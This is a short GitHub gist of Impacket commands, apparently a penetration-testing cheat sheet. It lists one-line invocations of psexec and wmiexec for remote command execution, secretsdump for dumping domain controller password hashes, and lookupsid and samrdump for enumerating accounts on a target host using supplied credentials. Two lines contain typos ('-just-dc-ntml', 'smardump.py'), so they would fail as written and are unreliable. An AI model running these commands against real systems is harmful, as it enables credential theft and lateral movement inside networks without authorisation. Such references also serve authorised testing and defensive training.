Skip to content

Instantly share code, notes, and snippets.

@alexandercastillo1
Created August 10, 2018 20:42
Show Gist options
  • Save alexandercastillo1/9f129d83be3dd1ebc4cf803ca53eb65a to your computer and use it in GitHub Desktop.
Save alexandercastillo1/9f129d83be3dd1ebc4cf803ca53eb65a to your computer and use it in GitHub Desktop.
ImpacketThatWork
**psexec**
python psexec.py username:password@target-ip
python psexec.py username:'password'@target-ip
**SecretsDump**
python secretsdump.py -just-dc-ntml domain/username@target-ip
**lookupsid**
python lookupsid.py domain/username:password@target-ip
**samrdump**
python smardump.py domain/username:password@target-ip
**wmiexec**
python wmiexec.py domain/username:password@target-ip
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment